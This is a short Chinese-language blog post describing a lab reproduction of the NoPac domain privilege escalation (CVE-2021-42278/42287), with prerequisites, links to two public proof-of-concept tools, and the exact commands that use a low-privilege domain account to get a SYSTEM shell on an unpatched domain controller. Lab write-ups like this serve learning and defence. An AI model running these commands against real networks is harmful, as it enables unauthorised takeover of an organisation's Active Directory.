NoPac (CVE-2021-42278 域提權)
前言 :
中秋節快樂,筆者是個肥仔(X,烤肉好香,連假回不去老家,就來寫個文章關於 NoPac (域提權) 漏洞,CVE 編號為 CVE-2021-42278、CVE-2021-42287,以後打內網又多了一招,有時候會覺得在什麼都碰的情況下,到後面還是要專注於某個領域成長會比較好,不過自己也還在摸索當中 xD
內文 :
其實原本是想玩 Tryhackme,畢竟自己內網 AD 滲透還不太熟悉,偶然間查到 NoPac(域提權) 漏洞,於是就花了點時間實作,還滿好玩的。
實作環境 :
kali : 192.168.109.136
Windows DC : 192.168.109.132
需求 :
1 普通域成員帳戶
2. 域用戶有創建機器用戶的權限(一般默認權限)
3. DC 未打補丁 KB5008380 / KB5008602
PoC1 :
https://github.com/WazeHell/sam-the-admin (目前只能在 kali 使用)
安裝環境 :
pip3 install -r requirements.txt
首先 sam_the_admin.py 修改路徑( impacket 中的 smbexec.py、scriptsdump.py)。
執行。
python3 sam_the_admin.py "tdslab.local/noth:1qaz@WSX" -dc-ip 192.168.109.132 -shell
成功獲取 system 權限。
PoC2 :
https://github.com/Ridter/noPac
安裝環境 :
pip3 install -r requirements.txt
執行。
python3 noPac.py -use-ldap tdslab.local/noth:1qaz@WSX -dc-ip 192.168.109.132 -shell
成功獲取 system 權限。
只要獲得普通域帳戶就可以提權,也就是說 Minikatz dump 出明文密碼只要 DC 存在此漏洞就輕輕鬆鬆提權,不過也多是學到一招了,畢竟自己還菜,近期目標應該就是多打橫向以及 AD,順便學學域維持權限,不過在實戰中又會遇到很多麻煩的防毒和狀況,把自己不足的地方補足就好。
留言
張貼留言